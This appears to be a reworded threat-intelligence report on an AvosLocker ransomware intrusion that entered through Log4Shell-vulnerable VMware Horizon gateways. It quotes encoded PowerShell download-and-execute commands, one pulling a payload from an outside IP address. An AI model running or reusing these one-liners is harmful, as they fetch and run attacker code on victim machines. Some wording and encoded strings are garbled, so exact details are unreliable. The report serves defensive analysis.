We recently noticed a month-long AvosLocker promotion during a client engagement. Cobalt Strike, Sliver, and various commercial network scanners were among the tools used by the attackers.
Two VMWare Horizon Unified Access Gateways that were vulnerable to Log4Shell served as the first entry point for this event. Despite the deployment of Cisco products on the network, the appliances were never installed, giving the attacker access to internal computers and a base of operations.
Several security events were discovered by the security products while the attacker was active on the network, but they were not investigated by the security team, which could have stopped the ransomware activity.
Threat Actor Profile: Avos
Avos is a ransomware organisation that was originally discovered in 2021 and initially targeted Windows computers. AvosLocker, a new ransomware version named after the gang, has lately begun to target Linux systems. Avos, which has been active since June 2021 and follows the ransomware-as-a-service (RaaS) model, which uses an affiliate scheme to attract potential partners, is well-funded and financially motivated. The program’s notice informs affiliates of the ransomware’s features and how operators of AvosLocker would manage negotiations and extortion tactics. On the Russian forum XSS, the user “Avos” has also been seen attempting to attract users.
Typically, Avos spreads ransomware using spam email campaigns as the initial infection vector. The initial vector in this incident, however, was an ESXi server exposed on the internet via VMWare Horizon Unified Access Gateways (UAG), which was vulnerable to the Log4Shell flaw. The customer alerted Talos on March 7, 2022, however activity connected to the ransomware assault had been detected as early as February 7, 2022.
Several vulnerabilities associated with Log4j, listed below, were found on this customer’s UAG:
A low-privilege non-root user called “gateway” may be able to exploit these vulnerabilities to execute remote code on Unified Access Gateways. The attackers utilised it as the initial access to build a foothold on the customer’s network, providing access to their internal servers. Beyond that, the inner-transit firewalls that may govern or limit access to the internal infrastructure were not configured.
Talos was able to gather crucial data about the whole attack lifecycle since the victim in this case used Cisco Secure Endpoint (formerly known as Advanced Malware Protection) as its EPP/EDR solution on the majority of endpoints, from workstations to servers.
The threat actor took a number of actions in the early stages of the attack to establish a foothold on the victim network. Other payloads and malicious tools, as well as the use of binaries for living off the land, were seen on endpoints (LoLBins).
At 01:41 UTC on February 11, Talos saw the attackers employing the WMI Provider Host (wmiprvse.exe) on a Windows Server that served as the initial point of entry to execute a PowerShell script that was encoded using the DownloadString technique.
On Feb. 14, a retrospective detection for the RuntimeBrokerService.exe executable in “C:WindowsSystem32temp” for creating a file called “watcher.exe” was triggered three days later. These files appear to be tied to a bitcoin miner rather than AvosLocker, therefore they could be relics from a different threat actor. In an effort to passively boost money, a miner is frequently used in conjunction with ransomware. However, given the discovery of DarkComet samples unrelated to this campaign, there is strong evidence that numerous threat actors compromised this network. Approximately four weeks later on March 4, another encoded PowerShell command was executed, shown below, again utilizing the DownloadString method.
powershell.exe -exec bypass -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHKACWB0AGUAbQAuAEAZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKAKQAUAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAAA6ACAALwA0ADUALgAxADMANgAuADIAMwAwACAWAADEAOgA0ADAAMAAwACAAyADMANABSADIAMWAnACkAOwA=
iex (New-Object SystemNetWebClient)DownloadString(‘http://45[.]136[.]230[.]191:4000/D234R23’);
On March 6, two days later, the attacker used further PowerShell scripts to download and run a Sliver payload known as “vmware kb.exe.” Team Cymru has seen the deployment of this executable in a similar campaign, as they mentioned in their blog post about Sliver. In the days that followed, a number of PowerShell scripts downloaded extra files, including Mimikatz and a “IIS Temporary Compressed Files.zip” bundle that contained Cobalt Strike beacons and a port scanner dubbed “scanner.exe.” SoftPerfect Network Scanner is a commercially available port scanner that Avos is well-known for installing. Later on the same day, the attackers made changes to administrative settings on both a local and a remote system using WMIC, which is a sign of early lateral movement.
Another PowerShell command seen on March 6 is an artefact from a Cobalt Strike beacon executing its powershell-import function, as shown below:
powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAAAuAFcAZQBiAGMAbAbABpAGUAbgB0ACkALgBEAG8A dwBuAGwAbwAgAUQAUWB0AHIAAQBuAGcAKAAAGgAdAB0AAAOgAvAC8AMQAyADcALgAwAC4AMAAAAAAAAGAzADIANAA2AdcALwAnACkA
IEX (New-Object NetWebclient)DownloadString(‘http://127.0.0.1:32467/’)
Another instance of the SoftPerfect Network Scanner was migrated to another server in the network using AnyDesk on March 8. The AvosLocker payload was finally delivered later that day, with the victim’s company name as the filename.
The attackers employed PDQ Deploy, a reliable software distribution tool, to spread ransomware and other tools throughout the target network. The victims’ files were encrypted when the ransomware was sent, and a ransom notice was shown, as shown below.
This incident emphasises the necessity of correctly setting up and configuring security appliances, applying updates and patches, and having a security team that is continually monitoring alerts. Even if the assault strategies employed in this campaign are not new, they might still be effective if the right security measures are not taken.
These attacks are likely to increase in frequency going forward with a highly motivated threat actor like Avos actively recruiting affiliates. Such attackers are continuously on the lookout for insecure networks, which they can easily access, sometimes with the help of several threat actors, like in this case. To detect, contain, and protect against post-exploitation activities, a layered defence strategy is required. While endpoint security and properly configured system activity analysis should be used in conjunction with static and network-based detection, both are crucial.